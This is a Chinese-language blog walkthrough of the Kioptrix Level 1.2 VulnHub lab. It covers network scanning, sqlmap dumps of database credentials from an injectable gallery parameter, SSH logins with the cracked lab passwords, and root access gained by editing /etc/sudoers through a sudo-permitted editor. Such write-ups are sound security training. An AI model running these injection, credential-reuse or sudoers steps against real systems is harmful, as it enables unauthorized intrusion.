VulnHub – Kioptrix: Level 1.2 (#3) walkthrough

Kioptrix: Level 1.2 (#3)介紹與載點
https://www.vulnhub.com/entry/kioptrix-level-12-3,24/

下載的靶機裡面有個README
裡面有提到說要修改host檔案
當然要先聽話乖乖去修改好

DISCLAIMER!
We at Kioptrix are not responsible for any damaged directly, or indirectly, 
caused by using this system. We suggest you do not connect this installation
to the Internet. It is, after all, a vulnerable setup. 
Please keep this in mind when playing the game.
This machine is setup to use DHCP.
Before playing the game, please modify your attacker's hosts file.
<ip>	kioptrix3.com
This challenge contains a Web Application.
If you have any questions, please direct them to:
comms[at]kioptrix.com

Hope you enjoy this challenge.
-Kioptrix Team

第一步先做發現,找到IP

root@hackercat:~# nmap -sP 192.168.112.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-04 08:19 EST
Nmap scan report for 192.168.112.1
Host is up (0.0028s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.112.2
Host is up (0.00069s latency).
MAC Address: 00:50:56:F7:2E:D5 (VMware)
Nmap scan report for 192.168.112.252
Host is up (0.00082s latency).
MAC Address: 00:0C:29:7B:06:39 (VMware)
Nmap scan report for 192.168.112.254
Host is up (0.00074s latency).
MAC Address: 00:50:56:E0:3D:E8 (VMware)
Nmap scan report for 192.168.112.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.11 seconds

modify the /etc/hosts file
add ip 192.168.122.252 assign kioptrix3.com

127.0.0.1	localhost
127.0.1.1	hackercat
10.10.10.162	staging-order.mango.htb
10.10.10.159	docker.registry.htb
192.168.112.252 kioptrix3.com
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

接著進行Port Scan,
發現只有SSH跟HTTP服務
OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)

root@hackercat:~/vulnhub/kioptrix-level-3# nmap -F -T4 192.168.112.252
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-04 08:23 EST
Nmap scan report for kioptrix3.com (192.168.112.252)
Host is up (0.00077s latency).
Not shown: 98 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:7B:06:39 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds
root@hackercat:~/vulnhub/kioptrix-level-3# cat 192.168.112.252_allPortTCP.txt 
# Nmap 7.80 scan initiated Tue Feb  4 08:22:38 2020 as: nmap -v -sV -Pn -sC -p- -oN 192.168.112.252_allPortTCP.txt 192.168.112.252
Nmap scan report for kioptrix3.com (192.168.112.252)
Host is up (0.0022s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-favicon: Unknown favicon MD5: 99EFC00391F142252888403BB1C196D2
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:7B:06:39 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb  4 08:22:52 2020 -- 1 IP address (1 host up) scanned in 14.03 seconds

先嘗試WEB的部分,利用目錄爆破用gobuster跑跑看

gobuster dir -e -k -o gobuster_http.txt -u http://192.168.112.252 -w /usr/share/wordlists/dirb/common.txt

有找看幾個頁面,但是幾乎都是403與301,看起來沒甚麼特別有趣的

root@hackercat:~/vulnhub/kioptrix-level-3# gobuster dir -e -k -o gobuster_http.txt -u http://192.168.112.252 -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.112.252
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/02/04 08:27:56 Starting gobuster
===============================================================
http://192.168.112.252/.htaccess (Status: 403)
http://192.168.112.252/.hta (Status: 403)
http://192.168.112.252/.htpasswd (Status: 403)
http://192.168.112.252/cache (Status: 301)
http://192.168.112.252/core (Status: 301)
http://192.168.112.252/data (Status: 403)
http://192.168.112.252/favicon.ico (Status: 200)
http://192.168.112.252/gallery (Status: 301)
http://192.168.112.252/index.php (Status: 200)
http://192.168.112.252/modules (Status: 301)
http://192.168.112.252/phpmyadmin (Status: 301)
http://192.168.112.252/server-status (Status: 403)
http://192.168.112.252/style (Status: 301)
===============================================================
2020/02/04 08:27:59 Finished
===============================================================

改成從Web Server下手,找到關於Apache似乎有趣的exploits,
https://www.exploit-db.com/exploits/42745
看起來很有趣,就直接試試看

root@hackercat:~/vulnhub/kioptrix-level-3# python3 42745.py 
usage: 42745.py [-h] [-n N] [-a] [-u] hosttocheck
42745.py: error: the following arguments are required: hosttocheck
root@hackercat:~/vulnhub/kioptrix-level-3# python3 42745.py -h
usage: 42745.py [-h] [-n N] [-a] [-u] hosttocheck
Check for the Optionsbleed vulnerability (CVE-2017-9798).
positional arguments:
  hosttocheck  The hostname you want to test against
optional arguments:
  -h, --help   show this help message and exit
  -n N         number of tests (default 10)
  -a, --all    show headers from hosts without problems
  -u, --url    pass URL instead of hostname
Tests server for Optionsbleed bug and other bugs in the allow header.
Autmatically checks http://, https://, http://www. and https://www. -
except if you pass -u/--url (which means by default we check 40 times.)
Explanation of results:
[bleed] corrupted header found, vulnerable
[empty] empty allow header, does not make sense
[spaces] space-separated method list (should be comma-separated)
[duplicates] duplicates in list (may be apache bug 61207)
[ok] normal list found (only shown with -a/--all)

結果是了一下我沒打出東西
接著回頭繼續看看網頁有甚麼功能,有沒有甚麼注入點
首頁長這個樣子

有個登入的畫面

有可以提交comments的地方

gallery有幾張圖片,有幾隻羊,
有個人對著你笑,笑得你心裡發寒

在上面的幾個參數點嘗試用SQL Injection看看,
在gallery的地方隨便戳一下就出現了MySQL Error

直接用sqlmap打了

sqlmap -u 'http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos' -dbs

sqlmap小抄

sqlmap -u [url] -D mysql --tables
sqlmap -u [url] -D mysql -T user --columns
sqlmap -u [url] -D [database] -T [tables] -C [columns] --dump

結果好像挖到了好東西XD

sqlmap -u 'http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos' -D mysql -T user -C User --dump
sqlmap -u 'http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos' -D mysql -T user -C Password --dump

翻到密碼,但是是有加密過的

sqlmap有嘗試解開可是失敗了,
sqlmap也有把密碼存在/tmp中。

/tmp/sqlmap_et4isc83372/sqlmaphashes-94jr5ex3.txt
root@hackercat:/tmp/sqlmap_et4isc83372# cat sqlmaphashes-94jr5ex3.txt 
*47FB3B1E573D80F44CD198DC65DE7764795F948E
*F46D660C8ED1B312A40E366A86D958C6F1EF2AB8

嘗試用john去解,結果沒有解開

root@hackercat:/tmp/sqlmap_et4isc83372# john --wordlist=/usr/share/wordlists/rockyou.txt sqlmaphashes-94jr5ex3.txt 
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (mysql-sha1, MySQL 4.1+ [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 2 candidates left, minimum 8 needed for performance.
0g 0:00:00:01 DONE (2020-02-04 09:25) 0g/s 10545Kp/s 10545Kc/s 21090KC/sa6_123..*7¡Vamos!
Session completed
root@hackercat:/tmp/sqlmap_et4isc83372# john --show sqlmaphashes-94jr5ex3.txt
0 password hashes cracked, 2 left

用hash-identifier確認看看hash的格式

改成以下方法,結果還是沒有解出

john -wordlist=/usr/share/wordlists/rockyou.txt --format=mysql-sha1 sqlmaphashes-94jr5ex3.txt
john --show sqlmaphashes-94jr5ex3.txt

先不管這個密碼了… 
撈撈看別的東西,看另一個dbs

sqlmap -u 'http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos' -D gallery --tables

shit! XD
結果這邊一下就挖出帳號密碼

sqlmap -u 'http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos' -D gallery -T gallarific_users -C username --dump
sqlmap -u 'http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos' -D gallery -T gallarific_users -C password --dump

admin:n0t7tlk4 
意外發現這個帳密…不知道能幹嘛
總之就是先記著

sqlmap -u 'http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos' -D gallery -T dev_accounts -C username --dump
sqlmap -u 'http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos' -D gallery -T dev_accounts -C password --dump

又意外的發現另一個dbs的帳密,
結果這個sqlmap成功破解了。

雖然目前還不知道這些帳密能幹嘛XD
但是撈到帳號密碼通常都是好事情

用網站弱掃工具Nikto嘗試掃描一下

root@hackercat:~/vulnhub/kioptrix-level-3# nikto -h http://kioptrix3.com
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.112.252
+ Target Hostname:    kioptrix3.com
+ Target Port:        80
+ Start Time:         2020-02-04 08:53:11 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Server may leak inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun  5 15:22:00 2009
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7784 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2020-02-04 08:53:40 (GMT-5) (29 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

有phpmyadmin的頁面,進去看看

隨便測試的時候意外發現
帳號不管輸入甚麼
只要不輸入密碼都可以登入…

突然想到有SSH,應該把剛剛sqlmap找到的帳密嘗試登入看看
dreg:Mast3r
loneferret:starwars

root@hackercat:~/vulnhub/kioptrix-level-3# ssh dreg@192.168.112.252
The authenticity of host '192.168.112.252 (192.168.112.252)' can't be established.
RSA key fingerprint is SHA256:NdsBnvaQieyTUKFzPjRpTVK6jDGM/xWwUi46IR/h1jU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.112.252' (RSA) to the list of known hosts.
dreg@192.168.112.252's password: 
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
dreg@Kioptrix3:~$ id
uid=1001(dreg) gid=1001(dreg) groups=1001(dreg)
dreg@Kioptrix3:~$ whoami
dreg
root@hackercat:/tmp/sqlmap_et4isc83372# ssh loneferret@192.168.112.252
loneferret@192.168.112.252's password: 
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$ ls
checksec.sh  CompanyPolicy.README
loneferret@Kioptrix3:~$ id
uid=1000(loneferret) gid=100(users) groups=100(users)
loneferret@Kioptrix3:~$ 

兩個都能成功登入 very cool
雖然權限不是root
來嘗試提權
直接拉一個linux-exploit-suggester.sh過去
結果馬上遇到問題

dreg@Kioptrix3:~$ cd /tmp
-rbash: cd: restricted
dreg@Kioptrix3:~$ ./linux-exploit-suggester.sh
-rbash: ./linux-exploit-suggester.sh: restricted: cannot specify `/' in command names

似乎受到了不少限制
放棄dreg這個使用者

玩看看loneferret
它的權限稍微大了點

loneferret@Kioptrix3:/tmp$ ./linux-exploit-suggester.sh
Script needs Bash in version 4.0 or newer. Aborting.

不過仍然不能執行
手動確認一下kernel

loneferret@Kioptrix3:/tmp$ uname -a
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux

想說找找看其他提權exploit,不過找exploit之前
回到原本登入ssh的地方好了
有兩個檔案,看看有沒有甚麼有趣的

loneferret@Kioptrix3:~$ ./checksec.sh
Usage: checksec [OPTION]
Options:
  --file <executable-file>
  --dir <directory> [-v]
  --proc <process name>
  --proc-all
  --proc-libs <process ID>
  --kernel
  --fortify-file <executable-file>
  --fortify-proc <process ID>
  --version
  --help
For more information, see:
  http://www.trapkit.de/tools/checksec.html
loneferret@Kioptrix3:~$ cat CompanyPolicy.README 
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
DG
CEO

嘗試輸入sudo ht

loneferret@Kioptrix3:~$ sudo ht
Error opening terminal: xterm-256color.

上網查一下
解法
export TERM=xterm
出現了一個藍白畫面~

查了一下
就是ht editor
就是個不好用的東西
不過目前執行這個是用sudo權限
所以應該是很有搞頭的東西

http://hte.sourceforge.net/readme.html
按alt+F 會可以選擇上方的選項
用上下左右去選到open file
本來想嘗試開啟/bin/bash

結果失敗

嘗試看看開啟/etc/sudoer
太神啦~ 可以開
快快改一下 把bash跟sh加到sudo裡面

記得alf+f 然後選擇save
接著ctrl+c跳出來就好 留言

輸入sudo /bin/bash就可以成功提權
不要傻傻的忘了加sudo
這樣還是在自己的bash XDD

loneferret@Kioptrix3:~$ /bin/bash
loneferret@Kioptrix3:~$ id
uid=1000(loneferret) gid=100(users) groups=100(users)
loneferret@Kioptrix3:~$ sudo /bin/bash
root@Kioptrix3:~# id
uid=0(root) gid=0(root) groups=0(root)

小小備註一下:
這個lab大概是在半年多前打的,這篇文章也是那個時候的隨手筆記
發文的時候邊把內容轉過來也邊看看當初的自己,
那個時候的思路真的跟現在差了一些,當時其實不少地方小小卡關,
主要還是在於最後的ht editor卡關滿久,現在來看仍覺得的確是個很有趣的lab

發佈留言